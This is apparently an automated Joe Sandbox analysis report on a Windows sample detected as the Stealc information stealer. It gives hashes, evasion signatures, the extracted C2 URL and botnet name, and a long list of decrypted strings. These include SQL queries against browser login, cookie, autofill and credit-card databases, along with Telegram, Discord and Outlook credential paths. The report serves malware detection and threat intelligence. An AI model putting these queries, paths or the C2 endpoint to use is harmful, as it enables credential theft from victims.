Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1546463
MD5:0851a659097fb0251ff585c552f6673d
SHA1:b3f95ea7672be4a71e2c5c6b19efd44b26d9d757
SHA256:045bfda1e383466d58bfe5dec775188ff592de16671dc6da7bf9c8fadba3ccba
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7116 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0851A659097FB0251FF585C552F6673D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1763680233.000000000145E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.1722686699.00000000050E0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7116JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7116JoeSecurity_StealcYara detected StealcJoe Security
              Click to see the 1 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.6b0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-31T23:47:05.311987+010020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.20680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.6b0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: INSERT_KEY_HERE
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: 30
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: 11
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: 20
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: 24
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GetProcAddress
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: LoadLibraryA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: lstrcatA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: OpenEventA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: CreateEventA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: CloseHandle
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: Sleep
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GetUserDefaultLangID
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: VirtualAllocExNuma
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: VirtualFree
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GetSystemInfo
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: VirtualAlloc
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: HeapAlloc
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GetComputerNameA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: lstrcpyA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GetProcessHeap
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GetCurrentProcess
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: lstrlenA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: ExitProcess
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GlobalMemoryStatusEx
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GetSystemTime
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: SystemTimeToFileTime
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: advapi32.dll
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: gdi32.dll
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: user32.dll
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: crypt32.dll
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: ntdll.dll
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GetUserNameA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: CreateDCA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GetDeviceCaps
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: ReleaseDC
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: CryptStringToBinaryA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: sscanf
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: VMwareVMware
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: HAL9TH
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: JohnDoe
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: DISPLAY
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: %hu/%hu/%hu
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: http://185.215.113.206
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: bksvnsj
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: /6c4adf523b719729.php
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: /746f34465cf17784/
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: tale
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GetEnvironmentVariableA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GetFileAttributesA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GlobalLock
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: HeapFree
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GetFileSize
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GlobalSize
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: CreateToolhelp32Snapshot
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: IsWow64Process
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: Process32Next
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GetLocalTime
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: FreeLibrary
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GetTimeZoneInformation
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GetSystemPowerStatus
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GetVolumeInformationA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GetWindowsDirectoryA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: Process32First
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GetLocaleInfoA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GetUserDefaultLocaleName
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GetModuleFileNameA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: DeleteFileA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: FindNextFileA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: LocalFree
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: FindClose
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: SetEnvironmentVariableA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: LocalAlloc
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GetFileSizeEx
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: ReadFile
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: SetFilePointer
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: WriteFile
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: CreateFileA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: FindFirstFileA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: CopyFileA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: VirtualProtect
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GetLogicalProcessorInformationEx
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GetLastError
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: lstrcpynA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: MultiByteToWideChar
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GlobalFree
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: WideCharToMultiByte
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GlobalAlloc
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: OpenProcess
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: TerminateProcess
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GetCurrentProcessId
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: gdiplus.dll
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: ole32.dll
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: bcrypt.dll
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: wininet.dll
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: shlwapi.dll
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: shell32.dll
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: psapi.dll
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: rstrtmgr.dll
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: CreateCompatibleBitmap
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: SelectObject
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: BitBlt
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: DeleteObject
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: CreateCompatibleDC
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GdipGetImageEncodersSize
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GdipGetImageEncoders
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GdiplusStartup
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GdiplusShutdown
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GdipSaveImageToStream
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GdipDisposeImage
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GdipFree
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GetHGlobalFromStream
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: CreateStreamOnHGlobal
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: CoUninitialize
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: CoInitialize
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: CoCreateInstance
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: BCryptGenerateSymmetricKey
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: BCryptCloseAlgorithmProvider
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: BCryptDecrypt
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: BCryptSetProperty
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: BCryptDestroyKey
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: BCryptOpenAlgorithmProvider
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GetWindowRect
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GetDesktopWindow
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GetDC
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: CloseWindow
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: wsprintfA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: EnumDisplayDevicesA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GetKeyboardLayoutList
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: CharToOemW
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: wsprintfW
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: RegQueryValueExA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: RegEnumKeyExA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: RegOpenKeyExA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: RegCloseKey
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: RegEnumValueA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: CryptBinaryToStringA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: CryptUnprotectData
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: SHGetFolderPathA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: ShellExecuteExA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: InternetOpenUrlA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: InternetConnectA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: InternetCloseHandle
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: InternetOpenA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: HttpSendRequestA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: HttpOpenRequestA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: InternetReadFile
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: InternetCrackUrlA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: StrCmpCA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: StrStrA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: StrCmpCW
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: PathMatchSpecA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: GetModuleFileNameExA
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: RmStartSession
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: RmRegisterResources
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: RmGetList
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: RmEndSession
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: sqlite3_open
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: sqlite3_prepare_v2
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: sqlite3_step
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: sqlite3_column_text
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: sqlite3_finalize
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: sqlite3_close
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: sqlite3_column_bytes
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: sqlite3_column_blob
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: encrypted_key
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: PATH
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: C:\ProgramData\nss3.dll
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: NSS_Init
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: NSS_Shutdown
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: PK11_GetInternalKeySlot
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: PK11_FreeSlot
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: PK11_Authenticate
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: PK11SDR_Decrypt
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: C:\ProgramData\
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: browser:
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: profile:
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: url:
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: login:
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: password:
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: Opera
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: OperaGX
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: Network
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: cookies
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: .txt
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: TRUE
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: FALSE
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: autofill
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: SELECT name, value FROM autofill
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: history
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: cc
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: name:
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: month:
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: year:
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: card:
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: Cookies
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: Login Data
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: Web Data
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: History
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: logins.json
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: formSubmitURL
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: usernameField
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: encryptedUsername
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: encryptedPassword
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: guid
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: cookies.sqlite
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: formhistory.sqlite
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: places.sqlite
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: plugins
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: Local Extension Settings
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: Sync Extension Settings
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: IndexedDB
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: Opera Stable
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: Opera GX Stable
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: CURRENT
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: chrome-extension_
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: _0.indexeddb.leveldb
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: Local State
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: profiles.ini
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: chrome
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: opera
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: firefox
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: wallets
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: %08lX%04lX%lu
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: ProductName
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: x32
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: x64
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: %d/%d/%d %d:%d:%d
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: ProcessorNameString
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: DisplayName
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: DisplayVersion
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: Network Info:
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: - IP: IP?
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: - Country: ISO?
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: System Summary:
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: - HWID:
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: - OS:
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: - Architecture:
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: - UserName:
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: - Computer Name:
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: - Local Time:
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: - UTC:
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: - Language:
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: - Keyboards:
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: - Laptop:
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: - Running Path:
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: - CPU:
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: - Threads:
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: - Cores:
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: - RAM:
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: - Display Resolution:
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: - GPU:
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: User Agents:
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: Installed Apps:
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: All Users:
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: Current User:
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: Process List:
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: system_info.txt
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: freebl3.dll
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: mozglue.dll
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: msvcp140.dll
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: nss3.dll
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: softokn3.dll
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: vcruntime140.dll
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: \Temp\
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: .exe
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: runas
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: open
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: /c start
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: %DESKTOP%
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: %APPDATA%
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: %LOCALAPPDATA%
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: %USERPROFILE%
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: %DOCUMENTS%
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: %PROGRAMFILES%
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: %PROGRAMFILES_86%
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: %RECENT%
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: *.lnk
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: files
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: \discord\
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: \Local Storage\leveldb\CURRENT
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: \Local Storage\leveldb
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: \Telegram Desktop\
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: key_datas
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: D877F783D5D3EF8C*
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: map*
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: A7FDF864FBC10B77*
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: A92DAA6EA6F891F2*
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: F8806DD0C461824F*
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: Telegram
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: Tox
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: *.tox
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: *.ini
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: Password
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: 00000001
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: 00000002
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: 00000003
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: 00000004
                Source: 0.2.file.exe.6b0000.0.unpackString decryptor: \Outlook\accounts.txt
